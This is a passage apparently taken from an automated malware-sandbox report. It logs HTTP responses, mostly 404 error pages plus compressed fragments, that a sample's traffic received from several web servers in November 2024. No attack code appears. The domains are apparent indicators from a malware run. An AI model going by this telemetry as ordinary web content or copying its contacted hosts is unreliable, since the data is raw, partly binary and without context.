a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrufJxLZ%2FVgL2esuhAHwZAkRphuH7iAbvctJyiKbcKPThg1c5pKFM8UUoOi8GocHXSzM22PQKXzPBXQF7gHGonW6k7Nem%2BRhmjbYU3AVuDp3FBqv1QGELYhZPXYdZitU6E2YrluqH3I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908eda7ca54339-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 
80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FudBy%2F2nHlDSqzVhDRlK9z5FjTpldXd3xeCquWeJTii5329YoqRKUDQ7q38J%2Bu7Q9qSuydJTp1gnGLGv4%2FDuJknMToK1VsvyDApNxAVHNA%2Bj0H84Kja1JgdNF3PajcgEm0BzfKaCC87R%2BmdC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908ff71eae7cb1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHXe%2F5nuGHGKHSl%2BPfc8XD8YM6jkH1NcdYQsI3k3fCAqTjnDWD0UH0DxMifz%2Beawk59vkNbrMhvQb%2Bjaq90w2c2vWR%2BvesY7YYwlo0iZfJ3Ub7KNz886Ujh5tnUsIsSbGauL2kJjkeGoappk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e90900809f56a52-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2217&rtt_var=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV2IaYCpixNYe3mqFXVSM%2FO3eeGrybftA0%2BMR9pMF%2B8hVEy%2FeYIPqVj7JxraMj1NX99bne%2Bo6RAoWNHsXYxOhC9uJ12VFoaVXIOh27%2FFc4eJLywhD1qmAK1bnIff%2BijPwZXeF6dSdEhMTsd6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9090187d9b4380-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1819&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRZ6d1xnVR99One%2BLuNtarSbt7v4HAW8CLWticqQmJvnwDuGpL6DPHmNPkEn0wqYWSL0Uwx62zrzxgNEERwprlPCz%2Bze%2FcUOaQa4QrkoJRTULg%2F2qyaLMSjk7VvPmT33SvMLDRaUpbQzJoLT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9090296f8e18d0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=507&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domínio Grátis - HostGator</title>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
